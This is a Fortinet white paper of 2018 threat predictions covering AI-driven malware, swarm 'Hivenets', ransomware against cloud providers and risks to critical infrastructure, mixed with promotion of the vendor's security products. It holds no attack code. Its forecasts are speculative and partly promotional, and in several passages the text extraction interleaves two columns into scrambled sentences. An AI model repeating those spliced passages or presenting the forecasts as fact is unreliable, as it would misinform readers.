FORTIGUARD 2018

THREAT PREDICTIONS

WHITE PAPER
WHITE PAPER: FORTIGUARD 2018 THREAT PREDICTIONS
Change is happening rapidly. It’s hard to believe that the
first smartphone was only introduced a little over a decade
ago, because universal connectivity is now literally affecting
every aspect of our lives. The rising generation will never
know a time when the world around them wasn’t filled
with connected devices able to immediately solve their
problems or meet their needs.
Individuals have a growing expectation for instant access
to highly personalized information and services through a
variety of interconnected devices. This demand is driving
the digital transformation of society. Businesses that want
to succeed in this new digital marketplace need to create
a culture of adaptability to stay ahead of demand from
both consumers and employees. Organizations still in the
process of adopting virtualization and the cloud have had
to begin transforming their networks yet again with things
like machine learning and artificial intelligence in order
to accelerate their ability to see, predict, and respond to
market trends.
And as with most technological and social change, there
is also a growing criminal element looking to exploit the
new opportunities that this new digital society provides.
The proliferation of online devices accessing personal
and financial information, and the growing connection
of everything – from armies of IoT devices and critical
infrastructure in cars, homes, and offices, to the rise
of smart cities – have also created new disruptive and
destructive opportunities for cyber criminals and other
threat actors.
THE GROWING THREAT LANDSCAPE
WAR OF THE AI
The cybercriminal marketplace has proven itself to be very
skilled at adopting the latest advances in such things as
artificial intelligence in order to more effectively detect and
exploit vulnerabilities, evade detection, adapt to complex
network environments, and maximize profitability.
Supervised vs Unsupervised Learning
Elon Musk has stated that whatever organization manages
to ‘master’ AI will have access to global control. That’s
not just hyperbole. Without proper controls in place, truly
autonomous and self-learning artificial intelligence would
2
WHITE PAPER: FORTIGUARD 2018 THREAT PREDICTIONS
be able to move freely through our hyperconnected digital
world, adapt to new digital environments, and access
virtually any digital resources.
It sounds like something from a science fiction movie, but
there are a growing number of experts who see real risks
posed by AI, especially in a world where connectivity has
outpaced security, and they are calling for regulations
and controls.
Part of the risk is related to the way that AI systems are
able to learn. Highly supervised incubators can spend
years carefully cultivating an artificial intelligence to perform
specific tasks in a predictable way. These are usually then
integrated into a Centaur Model where humans work
alongside automation and AI.
But even in a supervised environment, small errors
in learning models at the beginning can result in very
unexpected and even dangerous outcomes. A target
shooting comparison helps illustrate this point. If the barrel
of a rifle being aimed at a target several hundred yards
away is off by even a fraction of a millimeter, the shot will
not only miss the bulls eye, but probably the entire target
itself. AI systems are orders of magnitude more complex,
and responsible researchers are willing to go slowly
because they are aiming for accuracy and predictability.
Cybercriminals, however, are not so concerned. The
unsupervised learning models they are likely to use in
developing AI-based attacks, where speed of development
is more important than predictability, are especially
dangerous and could potentially be devastating. In such
scenarios, things can go sideways quickly.
Over the past year, for example, we have seen
cybercriminals repeatedly weaponize millions of unsecured
IoT devices and use them as a blunt instrument to take out
systems and networks, such as with Mirai or more recently,
with Reaper. As those devices become more sophisticated,
and attack methodologies become more intelligent, there
is the real potential to create swarms of compromised
IoT devices that would wreak indiscriminate havoc – think
Africanized bees.
If the best and the brightest of the cybersecurity research
community are calling for regulation, you can bet it’s
because they see that the cybercriminal community is
looking seriously at building these things, and are likely to
release them unsupervised into the wild.
The best defense against such intelligent and automated
threats is an integrated, collaborative, and highly adaptive
security fabric. Just as with AI, whoever can get the fabric-
based security system right, leveraging things like machine
learning and AI, will have a highly aware and proactive
security defense system better able to keep pace with new
automated, self-learning AI-based attacks.
Automation and Machine Learning
We’re not talking about future visions or something far
down the road. Indeed, Black Hats are already leveraging
automation and machine learning in their attack tactics,
techniques, and procedures (TTP). We already see attacks
with automated front ends mining for information and
vulnerabilities, combined with AI-based analysis to correlate
vast amounts of pilfered structured and unstructured data.
Of course, these sorts of strategies require massive
amounts of computing power. Which is why cybercriminals
are already using cloud services and public infrastructure
to launch and manage attack campaigns. For example,
cybercriminals have been using stolen credit card
information to access cloud services for many years. Today,
most cybercriminal organizations use high performance
computing (HPC) for CPU-intensive attacks such as
bit-coin mining or cloud password cracking. They also
use distributed computing and processing modes to
autonomously discover and learn about weak spots in
security systems.
We are now seeing the first attempts at automatically
generating code in order to effectively strike at vulnerable
targets using techniques such as fingerprinting and
blueprinting.
In addition, services like Shodan make it easier than ever
for cybercriminals to detect potential targets. Shodan is a
specialized search engine that searches for meta data from
service banners provided by online servers and devices.
It primarily collects data from web servers on ports 80,
8080, 443, and 8443 (http/https), but it also searches port
21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), 5060 (SIP),
and 554 (RTSP). It then catalogues all devices with a
remote interface, including web-enabled servers, network
devices, home security systems, webcams, traffic signals,
video projectors, routers, home heating systems, and
even SCADA systems. Since many of these devices are
set to accept default logins, once a device is located it is
often a fairly simple process to then own and compromise
that device.
3
WHITE PAPER: FORTIGUARD 2018 THREAT PREDICTIONS

of exploits based on the unique characteristics of that

detected weakness. It’s a natural evolution of tools that
already exists. Current polymorphic malware, which has
been around for decades, uses learning models to evade
security controls, and can produce more than a million
virus variations per day. But so far, this is just based on an
algorithm, and there is very little sophistication or control
over the output.

We are also seeing advanced services being offered on

darkweb marketplaces that leverage machine learning.
For example, a service known as FUD (fully undetected)
is now part of several Crime-as-a-Service offerings. This
service allows criminal developers to upload attack code
and malware to an analysis service for a fee, and then
receive a report as to whether security tools from different
vendors are able to detect it. This allows them to refine
their malware in order to strengthen the element of surprise
by circumventing security devices used by the targeted Next-gen “Morphic Malware,” however, will use entirely
company or government agency. new, customized attacks that will not simply be variations
based on a static algorithm, but will employ automation
In order to do this, these criminal service providers have
and machine learning to customize them to a unique target
begun creating their own computing clusters, similar to
while making them far harder to detect and mitigate.
those used by groups such as VirusTotal, leveraging their
own and hijacked compute resources that include security
tools from a variety of vendors in order to perform scanning
to test and refine malware. To shorten the development
cycle, it’s also now possible to leverage machine learning
in order to modify code on the fly based on how and
what has been detected in the lab in order to make these
cybercrime and penetration tools more effective and
undetectable.
Security vendors and researchers already use machine
learning to analyze a piece of code to determine if it is
good or bad, or whether or not it is malicious. Sandbox
BIG PREDICTION: THE RISE OF HIVENETS AND
tools, for example, bolstered with machine learning,
SWARMBOTS
allow us to quickly identify previously unseen threats and
dynamically create protections. There is no reason why this Over the past few years, we have seen the development of
same approach couldn’t be used in the other direction: predictive software using artificial intelligence techniques.
for mapping networks, finding attack targets, determining The latest advances in these sorts of tools use swarm
where those attack targets are weak, blueprinting a target technology to leverage massive databases of expert
to conduct virtual PEN testing, and then building and knowledge, comprised of billions of constantly updated
launching a custom attack. All done at the AI level and fully bits of data, to make accurate predictions. Such systems
automated. can be used to offer advice, make medical diagnoses,
or increase trading profitability on the stock exchange.
We are likely to begin seeing malware entirely written by
This sort of predictive analysis represents an entirely new
machines based on automated vulnerability detection
paradigm for how computing resources will be used to
and complex data analysis, followed by the development
transform our world.

4
WHITE PAPER: FORTIGUARD 2018 THREAT PREDICTIONS
Likewise, we predict that cybercriminals will begin to
replace traditional botnets with intelligent clusters of
compromised devices built around swarm technology
to create more effective attacks. If you think about it,
traditional botnets are mindless slaves – they wait for
commands from the bot herder (master) in order to execute
an attack. But what if these nodes were able to make
autonomous decisions with minimal supervision, use their
collective intelligence to solve problems, or simultaneously
target multiple vulnerability points in a network using a
variety of penetration and exploit techniques?
The result would be a Hivenet instead of a botnet. Such
a tool can leverage peer-based self-learning to effectively
target vulnerable systems at an unprecedented scale.
Hivenets will be able to use swarms of compromised
devices, or swarmbots, to simultaneously identify and
tackle different attack vectors. Hivenets are especially
dangerous because, unlike traditional botnet zombies,
individual swarmbots are smart. They are able to of talk to
each other, take action based on shared local intelligence,
use swarm intelligence to act on commands without the
botnet herder instructing them to do so, and recruit and
train new members of the hive. As a result, as a Hivenet
identifies and compromises more devices it will be able
to grow exponentially, and thereby widen its ability to
simultaneously attack multiple victims.
While IoT-based attacks such as Mirai or Reaper are not
using swarm technology yet, they already have the footprint
necessary. Reaper is especially concerning because it
uses a Lua engine with additional Lua scripts. Lua is an
embedded programming language designed to enable
scripts to run, allowing an attacker to switch from one
attack to another fairly easily. Upgrading to this sort of code
to leverage emerging swarm behaviors and AI would have
devastating consequences.
Responding to a Swarm Outbreak
There is currently very little that can be done to effectively
fight off such an attack. Traditional security tools allow
organizations to simultaneously fend off a single or even
several attackers. But a swarm is a completely different
sort of challenge. In many cases, especially sustained
multiple DDoS attacks, there’s simply not enough
mitigation capacity. Even today, with all of our advances
in technology, when a swarm of killer bees is headed your
way the best solution is to simply run away.
Protecting networks and services, including critical
infrastructure, from a swarm attack will require a systematic
approach based on identifying potential attack vectors
and engineering vulnerabilities out of a network. Simply
building in things like redundancy, automated backups,
and distributed network segmentation can go a long way
towards effectively mitigating the impact of such attacks.
The next step is to replace existing security tools with an
adaptive security fabric of integrated security devices.
Unlike the separate and isolated security devices most
organizations have in place, a security fabric is able to:
nnSee every device across the distributed network
nnDetect unknown threats, including the attack patterns
used by swarmbots
nnShare and correlate threat intelligence in real time to
harden systems and repel invaders
nnDynamically segment the network to prevent the lateral
spread of infection across the network
nnIsolate compromised devices and systems
nnRespond to attacks in a coordinated fashion, such
as automatically shutting down attack vectors by
dynamically reconfiguring the fabric as attack patterns
and methods become better defined through the real-
time correlation of threat intelligence
CLOUD SERVICE PROVIDERS - TARGETED
RANSOM AND THE SINGLE POINT OF FAILURE
The next big target for ransomware is likely to be cloud
service providers. We have already seen the beginnings of
this sort of attack in South Korea, where a hosting provider
recently paid a US$1 million ransom to get their services
back online. To understand why this is an attractive target
for cybercriminals, let’s break down how much revenue
these services drive, the weak points in the system, and
how these big fish are going to be targeted for high value
ransoms.
5
WHITE PAPER: FORTIGUARD 2018 THREAT PREDICTIONS
The financial opportunities are clear. Cloud computing is
expected to grow to $162B by 2020, with a compound
annual growth rate (CAGR) of 19%. In addition,
successfully taking down a cloud provider is a one-to-many
opportunity. The complex, hyperconnected networks that
cloud providers have developed can produce a single point
of failure for dozens or even hundreds of businesses. (Think
Mirai taking out a DNS hosting provider.)
Cloud services are also centralized and therefore present
a huge potential attack surface. Rather than hacking
businesses individually, criminals that are able to infiltrate
a single cloud environment would potentially have access
to data from dozens or hundreds of organizations, or be
able to wipe out an entire range of services with a single
attack. The disruption or ransom of Commercial Services
represents high value to cybercriminals
And it’s not just businesses that would be affected.
Government entities, critical infrastructure, law
enforcement, healthcare, and a wide range of industries of
all sizes all use the cloud – and many of the use the same
cloud provider. If a cyber terrorist were able to take down
a single major cloud service provider, the results would be
devastating.
This isn’t new. Cybercriminals have successfully targeted
cloud-based web hosting services in the past in order to
inject code into multiple high traffic web domains rather
than trying to do that one at a time. With new cloud
offerings, these criminals are not only able to continue that
sort of attack, but they also have access to things like data
and PII (personally identifiable information) which can have
high resale value on the dark web. The fact that there is so
much more at stake makes cloud providers increasingly
tempting targets.
As a result, we predict that cybercriminals will begin to
combine AI technologies with multi-vector attacks to scan
for, detect, and exploit weaknesses in a cloud provider’s
environment. Successfully crippling a service that generates
millions of dollars a day for the provider, while disrupting
service for potentially hundreds or thousands of businesses
and tens of thousands or even millions of their customers,
would not just represent a massive payday for a criminal
organization. It would also undermine the fragile trust that
many organizations already have when it comes to cloud-
based computing, and could have a devastating effect on
digital transformation and our digital economy.
HEALTHCARE & CRITICAL INFRASTRUCTURE –
AN ARMS RACE
Of all the industries that could potentially be affected by
advances in cybercrime techniques, healthcare and critical
infrastructure providers continue to be at the top of the
list in terms of risk. These organizations are in a difficult
position because their networks protect vital services and,
quite often, even human lives. At the same time, shifting
consumer demands are forcing these organizations to
adapt to new market pressures, and as a result, security
can sometimes be seen as an inhibitor to success. As a
result, the pressure to sacrifice security for productivity
has left many providers vulnerable. Given the state of
cyberthreats today, it is imperative that these organizations
act now to shore up their defenses before it’s too late.
Part of the challenge is that most critical infrastructure and
OT networks are notoriously fragile, and were originally
designed to be air-gapped and isolated. But the need
to respond at digital speeds to employee and consumer
demands has begun to change that, making everything
exposed (think cloud-enabled SCADA services.) Applying
security as an afterthought once a network designed to
operate in isolation is connected to the digital world is rarely
very effective.
Because of the high value of these networks, and
the potential for devastating results should they be
compromised or knocked offline, critical infrastructure and
healthcare providers are now finding themselves in an arms
race with cybercrime organizations. This puts them in a
difficult position, one the one hand, they are being forced
to trust new connected systems to provide both increased
intelligence and security, on the other, the risks are real.
Complicating matters further, the advances being made
by cybercriminals will soon be able to subvert current
security technologies. Cyberterrorists, for example, will
6
WHITE PAPER: FORTIGUARD 2018 THREAT PREDICTIONS
begin weaponizing cybercrime tools, converting them
into militarized malware, or ‘Milware,’ designed to cause
maximum damage to things like critical infrastructure. And
once the AI singularity takes place, offense vs. defense
(time to breach vs time to protect) will be reduced to a
matter of milliseconds rather than the hours or days it does
today.
The security these cloud systems currently have in place
will not be enough, which is why it is imperative that
organizations migrate to advanced security systems built
around quality intelligence, and adopt an integrated security
fabric strategy that can see across the distributed network,
counter the sophisticated attack systems being developed
and deployed by attackers, implement consistent security
policy everywhere, and easily integrate advances in both
collaboration and AI.
RESPONSE: SYSTEMS WILL BECOME MORE
INTELLIGENT AND INTEGRATED – THE RISE OF
“EXPERT SYSTEMS”
One critical response to advancements in malware and
cybercriminal technologies is the development of “expert
systems.” An expert system is a collection of integrated
software and programmed devices that use artificial
intelligence techniques to solve complex problems. For
example, expert systems use databases of knowledge to
offer advice, perform medical diagnoses, or make educated
decisions about trading on the stock exchange.
These expert systems cannot effectively operate
independently. Part of their success depends on different
systems operating together to solve complex challenges.
We have already begun to see this sort of advancement in
military applications. For example, new software designed
to function as an expert system now allows individual
fighter jets to integrate with each other in order to more
effectively carry out complex missions or respond to threats
with orchestrated countermeasures. These advanced
flight and targeting technologies enable them to make
autonomous and semi-autonomous decisions about
locating a target, evading an attack, or out-maneuvering an
opponent.
Smart cities operate in much the same way, coordinating
critical resources to respond to things like traffic,
emergency services, or even energy consumption. We
are also beginning to see business and public sector
systems start to overlap to ensure that things like energy,
water, or other critical infrastructure systems are able to
more effectively and efficiently respond to the needs of
manufacturing floors, agriculture, or energy production.
And at the same time, cyberterrorism and business-
oriented cybercrime are also beginning to converge as their
tools and techniques overlap. For example, disrupting a
business can have political implications and vice-versa.
Which is why expert security systems need to be
developed further to enable the critical sharing of
intelligence, allowing security architectures to work
in concert to root out and stop advanced threats. In
addition to integrating multi-cloud and mobile devices,
unsegmented and unsecured networks need to be actively
monitored and secured. To make this happen, isolated
security devices will need to be identified and replaced
with those designed to operate as part of a more complex,
integrated system.
One of the biggest challenges will be the last mile of
security – finding the will and the way to automate basic
security hygiene, such as patch and replace, hardening
systems, and implementing two-factor authentication.
Complex, multi-cloud ecosystems and hyperconverged
networks that span physical and virtual environments
make performing these basic security practices extremely
difficult to resolve. AI and automation need to fill this gap
by replacing basic security functions and day-to-day tasks
currently being performed by people with an integrated
expert security system that is able to:
nnDetermine device vulnerabilities, track and patch
devices, and apply security protocols or an IPS policy
to protect vulnerable devices until a patch is available or
they can be replaced
nnDevice misconfiguration is another huge problem.
Expert systems need to be able to configure both
security and network devices, monitor those
configurations, and make appropriate changes as the
network environments they operate in continue to shift.
nnAutomatically rank devices based on levels of trust,
dynamically segment traffic, especially from the growing
number IoT devices, even in highly elastic environments.
They then need to be able to identify and isolate
compromised devices to stop the spread of infection
and initiate remediation.
7
WHITE PAPER: TITLE…

RESPONSE: ADVANCED CTI (CYBER THREAT CONCLUSION

INTELLIGENCE) Make no mistake. Cybercriminals are organized, well
The days of being able to detect and thwart an attack using funded, and highly motivated. They are deploying
an isolated firewall positioned at a network access point are advanced malware, leveraging cloud-based computing
over. IP addresses, malware, traffic behaviors, and domains resources, and developing cutting edge tools based on
are the basic building blocks of cybercriminals, and they AI and machine learning to not only circumvent advanced
can be easily changed and moved to make them harder to security defenses, but to also widen the scope and scale
detect. Add things like multi-vector attacks, polymorphic of their attacks. There are still wide-open, greenfield
malware, and the ability to masquerade as legitimate opportunities for enterprising criminals that are being driven
network traffic and most traditional security solutions by such things as cloud computing and IoT that are just
quickly become virtually obsolete. waiting for the right tools to be compromised.
Instead, threat Intelligence needs to contextualize As a result, over the next couple of years we will see the
information beyond IP addresses and file hashes and focus attack surface expand through the use of automation
on things that are harder for cybercriminals to change. One and tools that are able to make autonomous or semi-
of these is attack patterns and techniques. By aggregating autonomous decisions. The challenge is that we are at
and correlating intelligence from tightly integrated fabric a very delicate moment in our transformation to a digital
solutions that span the distributed network with real-time society and economy. Once we arrive at the singularity –
data from global threat feeds, sophisticated analysis will be when AI takes on a life of its own without human interaction
able to provide a fingerprint of malicious behavior that can – massive disruptions caused by autonomous malware
be quickly identified and tracked. could have devastating implications and permanently
Finally, all threat actors have unique behaviors, signatures, reshape our future.
and patterns. Once you are able to identify and isolate Organizations need to respond by insisting on
different threat actors based on the fingerprint of their manufacturers developing more and better security controls
criminal activity, organizations will be able to predict built around integrated security technologies, quality threat
malicious behavior based on historical trends, detect intelligence, open standards, and dynamically configurable
attacks in their very earliest stages, and dynamically security fabrics. Security will also need to be able to
implement effective countermeasures based on known operate at digital speeds, which means automating security
attack stages. responses and applying intelligence and self-learning
so that networks can make effective and autonomous
decisions. This will allow us to replace organically
developed accidental network architectures with intentional
design that can not only withstand serious and sustained
attacks, but also automatically adapt and respond.
Like it or not, this is a winner-takes-all arms race.
Organizations that fail to prepare now may not be able to
catch up once it moves to the next level of sophistication.

GLOBAL HEADQUARTERS EMEA SALES OFFICE APAC SALES OFFICE LATIN AMERICA HEADQUARTERS
Fortinet Inc. 905 rue Albert Einstein 300 Beach Road 20-01 Sawgrass Lakes Center
899 Kifer Road 06560 Valbonne The Concourse 13450 W. Sunrise Blvd., Suite 430
Sunnyvale, CA 94086 France Singapore 199555 Sunrise, FL 33323
United States Tel: +33.4.8987.0500 Tel: +65.6513.3730 Tel: +1.954.368.9990
Tel: +1.408.235.7700
www.fortinet.com/sales

Copyright © 2017 Fortinet, Inc. All rights reserved. Fortinet®, FortiGate®, FortiCare® and FortiGuard®, and certain other marks are registered trademarks of Fortinet, Inc., and other Fortinet names herein may also be registered and/or common
law trademarks of Fortinet. All other product or company names may be trademarks of their respective owners. Performance and other metrics contained herein were attained in internal lab tests under ideal conditions, and actual performance
and other results may vary. Network variables, different network environments and other conditions may affect performance results. Nothing herein represents any binding commitment by Fortinet, and Fortinet disclaims all warranties, whether
express or implied, except to the extent Fortinet enters a binding written contract, signed by Fortinet’s General Counsel, with a purchaser that expressly warrants that the identified product will perform according to certain expressly-identified
performance metrics and, in such event, only the specific performance metrics expressly identified in such binding written contract shall be binding on Fortinet. For absolute clarity, any such warranty will be limited to performance in the same
ideal conditions as in Fortinet’s internal lab tests. Fortinet disclaims in full any covenants, representations, and guarantees pursuant hereto, whether express or implied. Fortinet reserves the right to change, modify, transfer, or otherwise revise this
publication without notice, and the most current version of the publication shall be applicable. Fortinet disclaims in full any covenants, representations, and guarantees pursuant hereto, whether express or implied. Fortinet reserves the right to
change, modify, transfer, or otherwise revise this publication without notice, and the most current version of the publication shall be applicable. 141670 0 A4 EN November 20, 2017 12:21 PM
Macintosh HD:Users:wbrandthiatt:Documents:Egnyte:Shared:CREATIVE SERVICES:Team:Whitney-Brandt-Hiatt:White-Paper-FortiGuard-2018-Threat-Predictions-EMEA:WP-FortiGuard-2018-Threat-Predictions-A4